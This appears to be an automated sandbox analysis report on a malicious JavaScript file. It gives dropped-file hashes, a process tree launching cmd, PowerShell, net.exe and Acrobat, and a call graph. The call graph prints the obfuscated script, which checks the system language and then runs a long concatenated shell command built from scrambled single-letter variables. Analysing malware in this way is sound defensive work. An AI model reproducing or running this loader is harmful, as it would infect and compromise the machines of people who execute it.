Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/M7oMOWLaGZ4ZwYIGNP8dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RVWLaGZ4ZwZGm3mlind9i4ufFXpAXkru |
MD5: | E787F9888A1628BE8234F19E8EE26D68 |
SHA1: | 44D5180C06ADBBDAADDBCE350CE4DEC997CD83E5 |
SHA-256: | 3A09F3799148DA49F039A35AEDD22F368FB35B8D6022C4691C10606F704DAF80 |
SHA-512: | EE9B602898706CC0F33AA570E29A79A58ED748E1B738D74DF0C8C8DF193E23421B47AC8C862623ED774289D94FA90662A4CC436B80479D6420433D81752E9CA9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.918103374036562 |
TrID: | |
File name: | 2272523722022218526.js |
File size: | 20'301 bytes |
MD5: | 847be9017f4bed6ca5a506fd9fd9e300 |
SHA1: | 21da425147ca69cac1e1ff843e22cc358fe03e1e |
SHA256: | a20086aad74b5d3cb8c4729ef3df9db87ed896a841bfea5f326dca1d4fe5f1e5 |
SHA512: | 0091670a9ee04ee688a870c9a47e9b91cf031dfa03caafcae01a75df41a060e94da4ff5004b94c9bfff75a0dad6dded14cfd8b35e7052fc128d309b026bb17c3 |
SSDEEP: | 384:cp2v9FgrRUC2DbSBnj8sbgnRi6xyKg/thS5xPnn8Aks7G4S4FdShgEDBm65lDfcr:CTrRUC2DbSBnj8sbgnRi6xyKg/thS5xn |
TLSH: | E19241EDCD610F2C49D17EB5722115D86608460CC9E396A2AF103511EBE8F598BDBEFC |
File Content Preview: | function hhhtam(){qhzjkzd=[1031,3079,5127,4103,2055,3072];var ashdydo=this[ktgpqdz+bvwwh+gzgek+bwbzhcvfw+tlaycuwmg+cfqskvlj+jhtfyn+znfaypwcz](this[ilukledq+tifmgysgb+jtvviz+gzgek+abxxldmaz+ktgpqdz+znfaypwcz][tuisssgb+gzgek+tlaycuwmg+bvwwh+znfaypwcz+tlaycu |
Icon Hash: | 68d69b8bb6aa9a86 |
Target ID: | 0 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff607960000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65ba10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 00:19:56 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 7 |
Start time: | 00:19:56 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65ba10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 00:19:56 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7506d0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 00:19:57 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 00:19:57 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 11 |
Start time: | 00:19:57 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Script: |
---|
Code | ||
---|---|---|
0 | function hhhtam() { |
|
1 | qhzjkzd = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var ashdydo = this[ktgpqdz + bvwwh + gzgek + bwbzhcvfw + tlaycuwmg + cfqskvlj + jhtfyn + znfaypwcz] ( this[ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz][tuisssgb + gzgek + tlaycuwmg + bvwwh + znfaypwcz + tlaycuwmg + tsvgtsa + bzvwhcb + peemmc + tlaycuwmg + jtvviz + znfaypwcz] ( ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz + xjmnfbmb + tifmgysgb + ylfvkvkhr + tlaycuwmg + izqvxtaa + izqvxtaa ) [pjybzdo + tlaycuwmg + amyhx + pjybzdo + tlaycuwmg + bvwwh + shwlqequ] ( jfdunreo + bkaev + goijnk + qmnebka + xlcsnv + tuisssgb + lizulmnc + pjybzdo + pjybzdo + goijnk + dohht + minial + xlcsnv + lizulmnc + tifmgysgb + goijnk + pjybzdo + bcldge + tuisssgb + ewwbvykp + jhtfyn + znfaypwcz + gzgek + ewwbvykp + izqvxtaa + xuvhkoj + pgnuhrymy + bvwwh + jhtfyn + tlaycuwmg + izqvxtaa + bcldge + cfqskvlj + jhtfyn + znfaypwcz + tlaycuwmg + gzgek + jhtfyn + bvwwh + znfaypwcz + abxxldmaz + ewwbvykp + jhtfyn + bvwwh + izqvxtaa + bcldge + jclmmjdfo + ewwbvykp + jtvviz + bvwwh + izqvxtaa + tlaycuwmg ), 16 ); |
|
3 | for ( dvttqmtxh = 0 ; dvttqmtxh < qhzjkzd[izqvxtaa + tlaycuwmg + jhtfyn + amyhx + znfaypwcz + ylfvkvkhr] ; ++ dvttqmtxh ) | |
4 | { | |
5 | if ( ashdydo == qhzjkzd[dvttqmtxh] ) | |
6 | { | |
7 | ashdydo = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( ashdydo !== true ) | |
12 | this[ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz][fjbxpn + gndfbva + abxxldmaz + znfaypwcz] ( ); | |
13 | this[ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz][tuisssgb + gzgek + tlaycuwmg + bvwwh + znfaypwcz + tlaycuwmg + tsvgtsa + bzvwhcb + peemmc + tlaycuwmg + jtvviz + znfaypwcz] ( ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz + xjmnfbmb + tifmgysgb + ylfvkvkhr + tlaycuwmg + izqvxtaa + izqvxtaa ) [gzgek + gndfbva + jhtfyn] ( jtvviz + gynqb + shwlqequ + xuvhkoj + jiigyk + jtvviz + xuvhkoj + ktgpqdz + ewwbvykp + mlpwmrfwz + tlaycuwmg + gzgek + bwbzhcvfw + ylfvkvkhr + tlaycuwmg + izqvxtaa + izqvxtaa + xjmnfbmb + tlaycuwmg + rsrmenjp + tlaycuwmg + xuvhkoj + waihq + tuisssgb + ewwbvykp + gynqb + gynqb + bvwwh + jhtfyn + shwlqequ + xuvhkoj + vbhqodk + cfqskvlj + jhtfyn + waxant + ewwbvykp + qledvgj + tlaycuwmg + waihq + ilukledq + tlaycuwmg + bzvwhcb + pjybzdo + tlaycuwmg + laubkhqkm + gndfbva + tlaycuwmg + bwbzhcvfw + znfaypwcz + xuvhkoj + waihq + tsvgtsa + gndfbva + znfaypwcz + zrsewurxl + abxxldmaz + izqvxtaa + tlaycuwmg + xuvhkoj + uuyvyq + znfaypwcz + tlaycuwmg + gynqb + ktgpqdz + uuyvyq + bcldge + abxxldmaz + jhtfyn + waxant + ewwbvykp + abxxldmaz + jtvviz + tlaycuwmg + xjmnfbmb + ktgpqdz + shwlqequ + eoaves + xuvhkoj + ylfvkvkhr + znfaypwcz + znfaypwcz + ktgpqdz + lwdpkfyo + jiigyk + jiigyk + ffkbd + xlqnhtbb + secprbjlo + xjmnfbmb + ffkbd + dphduhshg + secprbjlo + xjmnfbmb + ffkbd + xjmnfbmb + mzyvtr + phibypc + iylfrme + jiigyk + abxxldmaz + jhtfyn + waxant + ewwbvykp + abxxldmaz + jtvviz + tlaycuwmg + xjmnfbmb + ktgpqdz + ylfvkvkhr + ktgpqdz + vbhqodk + bfsyze + bfsyze + bwbzhcvfw + znfaypwcz + bvwwh + gzgek + znfaypwcz + xuvhkoj + uuyvyq + znfaypwcz + tlaycuwmg + gynqb + ktgpqdz + uuyvyq + bcldge + abxxldmaz + jhtfyn + waxant + ewwbvykp + abxxldmaz + jtvviz + tlaycuwmg + xjmnfbmb + ktgpqdz + shwlqequ + eoaves + bfsyze + bfsyze + jtvviz + gynqb + shwlqequ + xuvhkoj + jiigyk + jtvviz + xuvhkoj + jhtfyn + tlaycuwmg + znfaypwcz + xuvhkoj + gndfbva + bwbzhcvfw + tlaycuwmg + xuvhkoj + bcldge + bcldge + ffkbd + 
xlqnhtbb + secprbjlo + xjmnfbmb + ffkbd + dphduhshg + secprbjlo + xjmnfbmb + ffkbd + xjmnfbmb + mzyvtr + phibypc + iylfrme + yhvhg + llmdxu + llmdxu + llmdxu + llmdxu + bcldge + shwlqequ + bvwwh + waxant + mlpwmrfwz + mlpwmrfwz + mlpwmrfwz + gzgek + ewwbvykp + ewwbvykp + znfaypwcz + bcldge + bfsyze + bfsyze + jtvviz + gynqb + shwlqequ + xuvhkoj + jiigyk + jtvviz + xuvhkoj + gzgek + tlaycuwmg + amyhx + bwbzhcvfw + waxant + gzgek + secprbjlo + mzyvtr + xuvhkoj + jiigyk + bwbzhcvfw + xuvhkoj + bcldge + bcldge + ffkbd + xlqnhtbb + secprbjlo + xjmnfbmb + ffkbd + dphduhshg + secprbjlo + xjmnfbmb + ffkbd + xjmnfbmb + mzyvtr + phibypc + iylfrme + yhvhg + llmdxu + llmdxu + llmdxu + llmdxu + bcldge + shwlqequ + bvwwh + waxant + mlpwmrfwz + mlpwmrfwz + mlpwmrfwz + gzgek + ewwbvykp + ewwbvykp + znfaypwcz + bcldge + mzyvtr + hkshlfxx + secprbjlo + mzyvtr + secprbjlo + mzyvtr + wqgbhs + xlqnhtbb + ffkbd + mzyvtr + hkshlfxx + phibypc + llmdxu + llmdxu + xjmnfbmb + shwlqequ + izqvxtaa + izqvxtaa, 0, false ); |
|
14 | } | |
15 | wqgbhs = "V"; | |
16 | wqgbhs = "u"; | |
17 | wqgbhs = "G"; | |
18 | wqgbhs = "K"; | |
19 | wqgbhs = "S"; | |
20 | wqgbhs = "V"; | |
21 | wqgbhs = "t"; | |
22 | wqgbhs = "c"; | |
23 | wqgbhs = "q"; | |
24 | wqgbhs = "s"; | |
25 | wqgbhs = "g"; | |
26 | wqgbhs = "M"; | |
27 | wqgbhs = "a"; | |
28 | wqgbhs = "7"; | |
29 | zrsewurxl = "S"; | |
30 | zrsewurxl = "o"; | |
31 | zrsewurxl = "x"; | |
32 | zrsewurxl = "i"; | |
33 | zrsewurxl = "v"; | |
34 | zrsewurxl = "F"; | |
35 | mlpwmrfwz = "H"; | |
36 | mlpwmrfwz = "h"; | |
37 | mlpwmrfwz = "k"; | |
38 | mlpwmrfwz = "m"; | |
39 | mlpwmrfwz = "e"; | |
40 | mlpwmrfwz = "R"; | |
41 | mlpwmrfwz = "w"; | |
42 | mlpwmrfwz = "y"; | |
43 | mlpwmrfwz = "R"; | |
44 | mlpwmrfwz = "m"; | |
45 | mlpwmrfwz = "X"; | |
46 | mlpwmrfwz = "J"; | |
47 | mlpwmrfwz = "y"; | |
48 | mlpwmrfwz = "N"; | |
49 | mlpwmrfwz = "x"; | |
50 | mlpwmrfwz = "P"; | |
51 | mlpwmrfwz = "h"; | |
52 | mlpwmrfwz = "N"; | |
53 | mlpwmrfwz = "S"; | |
54 | mlpwmrfwz = "B"; | |
55 | mlpwmrfwz = "n"; | |
56 | mlpwmrfwz = "I"; | |
57 | mlpwmrfwz = "K"; | |
58 | mlpwmrfwz = "n"; | |
59 | mlpwmrfwz = "p"; | |
60 | mlpwmrfwz = "H"; | |
61 | mlpwmrfwz = "P"; | |
62 | mlpwmrfwz = "T"; | |
63 | mlpwmrfwz = "i"; | |
64 | mlpwmrfwz = "Q"; | |
65 | mlpwmrfwz = "h"; | |
66 | mlpwmrfwz = "s"; | |
67 | mlpwmrfwz = "w"; | |
68 | gynqb = "T"; | |
69 | gynqb = "c"; | |
70 | gynqb = "N"; | |
71 | gynqb = "Z"; | |
72 | gynqb = "v"; | |
73 | gynqb = "c"; | |
74 | gynqb = "t"; | |
75 | gynqb = "q"; | |
76 | gynqb = "S"; | |
77 | gynqb = "q"; | |
78 | gynqb = "a"; | |
79 | gynqb = "n"; | |
80 | gynqb = "g"; | |
81 | gynqb = "L"; | |
82 | gynqb = "E"; | |
83 | gynqb = "L"; | |
84 | gynqb = "K"; | |
85 | gynqb = "z"; | |
86 | gynqb = "C"; | |
87 | gynqb = "u"; | |
88 | gynqb = "M"; | |
89 | gynqb = "L"; | |
90 | gynqb = "b"; | |
91 | gynqb = "V"; | |
92 | gynqb = "e"; | |
93 | gynqb = "O"; | |
94 | gynqb = "t"; | |
95 | gynqb = "I"; | |
96 | gynqb = "o"; | |
97 | gynqb = "E"; | |
98 | gynqb = "E"; | |
99 | gynqb = "v"; | |
100 | gynqb = "K"; | |
101 | gynqb = "N"; | |
102 | gynqb = "f"; | |
103 | gynqb = "w"; | |
104 | gynqb = "E"; | |
105 | gynqb = "n"; | |
106 | gynqb = "l"; | |
107 | gynqb = "P"; | |
108 | gynqb = "U"; | |
109 | gynqb = "m"; | |
110 | dphduhshg = "Z"; | |
111 | dphduhshg = "Z"; | |
112 | dphduhshg = "J"; | |
113 | dphduhshg = "l"; | |
114 | dphduhshg = "D"; | |
115 | dphduhshg = "k"; | |
116 | dphduhshg = "u"; | |
117 | dphduhshg = "T"; | |
118 | dphduhshg = "G"; | |
119 | dphduhshg = "u"; | |
120 | dphduhshg = "d"; | |
121 | dphduhshg = "p"; | |
122 | dphduhshg = "L"; | |
123 | dphduhshg = "n"; | |
124 | dphduhshg = "y"; | |
125 | dphduhshg = "p"; | |
126 | dphduhshg = "y"; | |
127 | dphduhshg = "b"; | |
128 | dphduhshg = "D"; | |
129 | dphduhshg = "m"; | |
130 | dphduhshg = "M"; | |
131 | dphduhshg = "B"; | |
132 | dphduhshg = "F"; | |
133 | dphduhshg = "U"; | |
134 | dphduhshg = "V"; | |
135 | dphduhshg = "K"; | |
136 | dphduhshg = "Z"; | |
137 | dphduhshg = "f"; | |
138 | dphduhshg = "L"; | |
139 | dphduhshg = "F"; | |
140 | dphduhshg = "K"; | |
141 | dphduhshg = "O"; | |
142 | dphduhshg = "g"; | |
143 | dphduhshg = "n"; | |
144 | dphduhshg = "T"; | |
145 | dphduhshg = "g"; | |
146 | dphduhshg = "W"; | |
147 | dphduhshg = "h"; | |
148 | dphduhshg = "Y"; | |
149 | dphduhshg = "o"; | |
150 | dphduhshg = "4"; | |
151 | bwbzhcvfw = "i"; | |
152 | bwbzhcvfw = "B"; | |
153 | bwbzhcvfw = "D"; | |
154 | bwbzhcvfw = "G"; | |
155 | bwbzhcvfw = "t"; | |
156 | bwbzhcvfw = "W"; | |
157 | bwbzhcvfw = "K"; | |
158 | bwbzhcvfw = "R"; | |
159 | bwbzhcvfw = "x"; | |
160 | bwbzhcvfw = "K"; | |
161 | bwbzhcvfw = "w"; | |
162 | bwbzhcvfw = "K"; | |
163 | bwbzhcvfw = "k"; | |
164 | bwbzhcvfw = "Z"; | |
165 | bwbzhcvfw = "v"; | |
166 | bwbzhcvfw = "n"; | |
167 | bwbzhcvfw = "c"; | |
168 | bwbzhcvfw = "n"; | |
169 | bwbzhcvfw = "H"; | |
170 | bwbzhcvfw = "j"; | |
171 | bwbzhcvfw = "q"; | |
172 | bwbzhcvfw = "X"; | |
173 | bwbzhcvfw = "t"; | |
174 | bwbzhcvfw = "t"; | |
175 | bwbzhcvfw = "C"; | |
176 | bwbzhcvfw = "v"; | |
177 | bwbzhcvfw = "q"; | |
178 | bwbzhcvfw = "q"; | |
179 | bwbzhcvfw = "o"; | |
180 | bwbzhcvfw = "c"; | |
181 | bwbzhcvfw = "V"; | |
182 | bwbzhcvfw = "i"; | |
183 | bwbzhcvfw = "A"; | |
184 | bwbzhcvfw = "F"; | |
185 | bwbzhcvfw = "t"; | |
186 | bwbzhcvfw = "g"; | |
187 | bwbzhcvfw = "K"; | |
188 | bwbzhcvfw = "R"; | |
189 | bwbzhcvfw = "U"; | |
190 | bwbzhcvfw = "i"; | |
191 | bwbzhcvfw = "r"; | |
192 | bwbzhcvfw = "r"; | |
193 | bwbzhcvfw = "s"; | |
194 | bzvwhcb = "u"; | |
195 | bzvwhcb = "D"; | |
196 | bzvwhcb = "z"; | |
197 | bzvwhcb = "U"; | |
198 | bzvwhcb = "E"; | |
199 | bzvwhcb = "z"; | |
200 | bzvwhcb = "T"; | |
201 | bzvwhcb = "v"; | |
202 | bzvwhcb = "G"; | |
203 | bzvwhcb = "R"; | |
204 | bzvwhcb = "L"; | |
205 | bzvwhcb = "X"; | |
206 | bzvwhcb = "c"; | |
207 | bzvwhcb = "l"; | |
208 | bzvwhcb = "H"; | |
209 | bzvwhcb = "K"; | |
210 | bzvwhcb = "n"; | |
211 | bzvwhcb = "Z"; | |
212 | bzvwhcb = "B"; | |
213 | bzvwhcb = "X"; | |
214 | bzvwhcb = "l"; | |
215 | bzvwhcb = "d"; | |
216 | bzvwhcb = "D"; | |
217 | bzvwhcb = "k"; | |
218 | bzvwhcb = "s"; | |
219 | bzvwhcb = "P"; | |
220 | bzvwhcb = "u"; | |
221 | bzvwhcb = "Z"; | |
222 | bzvwhcb = "Q"; | |
223 | bzvwhcb = "H"; | |
224 | bzvwhcb = "c"; | |
225 | bzvwhcb = "V"; | |
226 | bzvwhcb = "e"; | |
227 | bzvwhcb = "l"; | |
228 | bzvwhcb = "p"; | |
229 | bzvwhcb = "b"; | |
230 | ffkbd = "l"; | |
231 | ffkbd = "j"; | |
232 | ffkbd = "F"; | |
233 | ffkbd = "a"; | |
234 | ffkbd = "y"; | |
235 | ffkbd = "Z"; | |
236 | ffkbd = "w"; | |
237 | ffkbd = "M"; | |
238 | ffkbd = "A"; | |
239 | ffkbd = "t"; | |
240 | ffkbd = "D"; | |
241 | ffkbd = "y"; | |
242 | ffkbd = "p"; | |
243 | ffkbd = "M"; | |
244 | ffkbd = "g"; | |
245 | ffkbd = "J"; | |
246 | ffkbd = "b"; | |
247 | ffkbd = "G"; | |
248 | ffkbd = "z"; | |
249 | ffkbd = "R"; | |
250 | ffkbd = "p"; | |
251 | ffkbd = "e"; | |
252 | ffkbd = "I"; | |
253 | ffkbd = "Z"; | |
254 | ffkbd = "o"; | |
255 | ffkbd = "G"; | |
256 | ffkbd = "U"; | |
257 | ffkbd = "M"; | |
258 | ffkbd = "1"; | |
259 | tifmgysgb = "u"; | |
260 | tifmgysgb = "o"; | |
261 | tifmgysgb = "P"; | |
262 | tifmgysgb = "A"; | |
263 | tifmgysgb = "V"; | |
264 | tifmgysgb = "n"; | |
265 | tifmgysgb = "S"; | |
266 | jtvviz = "f"; | |
267 | jtvviz = "A"; | |
268 | jtvviz = "B"; | |
269 | jtvviz = "e"; | |
270 | jtvviz = "D"; | |
271 | jtvviz = "x"; | |
272 | jtvviz = "p"; | |
273 | jtvviz = "C"; | |
274 | jtvviz = "Q"; | |
275 | jtvviz = "S"; | |
276 | jtvviz = "J"; | |
277 | jtvviz = "c"; | |
278 | cfqskvlj = "g"; | |
279 | cfqskvlj = "Q"; | |
280 | cfqskvlj = "R"; | |
281 | cfqskvlj = "y"; | |
282 | cfqskvlj = "g"; | |
283 | cfqskvlj = "j"; | |
284 | cfqskvlj = "Y"; | |
285 | cfqskvlj = "p"; | |
286 | cfqskvlj = "t"; | |
287 | cfqskvlj = "B"; | |
288 | cfqskvlj = "F"; | |
289 | cfqskvlj = "P"; | |
290 | cfqskvlj = "y"; | |
291 | cfqskvlj = "p"; | |
292 | cfqskvlj = "O"; | |
293 | cfqskvlj = "D"; | |
294 | cfqskvlj = "v"; | |
295 | cfqskvlj = "S"; | |
296 | cfqskvlj = "C"; | |
297 | cfqskvlj = "w"; | |
298 | cfqskvlj = "P"; | |
299 | cfqskvlj = "H"; | |
300 | cfqskvlj = "p"; | |
301 | cfqskvlj = "h"; | |
302 | cfqskvlj = "I"; | |
303 | ewwbvykp = "v"; | |
304 | ewwbvykp = "f"; | |
305 | ewwbvykp = "U"; | |
306 | ewwbvykp = "k"; | |
307 | ewwbvykp = "h"; | |
308 | ewwbvykp = "W"; | |
309 | ewwbvykp = "L"; | |
310 | ewwbvykp = "P"; | |
311 | ewwbvykp = "s"; | |
312 | ewwbvykp = "G"; | |
313 | ewwbvykp = "X"; | |
314 | ewwbvykp = "p"; | |
315 | ewwbvykp = "T"; | |
316 | ewwbvykp = "u"; | |
317 | ewwbvykp = "X"; | |
318 | ewwbvykp = "o"; | |
319 | ewwbvykp = "l"; | |
320 | ewwbvykp = "o"; | |
321 | ewwbvykp = "x"; | |
322 | ewwbvykp = "a"; | |
323 | ewwbvykp = "O"; | |
324 | ewwbvykp = "r"; | |
325 | ewwbvykp = "J"; | |
326 | ewwbvykp = "o"; | |
327 | gzgek = "B"; | |
328 | gzgek = "W"; | |
329 | gzgek = "M"; | |
330 | gzgek = "m"; | |
331 | gzgek = "M"; | |
332 | gzgek = "g"; | |
333 | gzgek = "Z"; | |
334 | gzgek = "O"; | |
335 | gzgek = "J"; | |
336 | gzgek = "s"; | |
337 | gzgek = "h"; | |
338 | gzgek = "W"; | |
339 | gzgek = "a"; | |
340 | gzgek = "n"; | |
341 | gzgek = "O"; | |
342 | gzgek = "G"; | |
343 | gzgek = "x"; | |
344 | gzgek = "P"; | |
345 | gzgek = "s"; | |
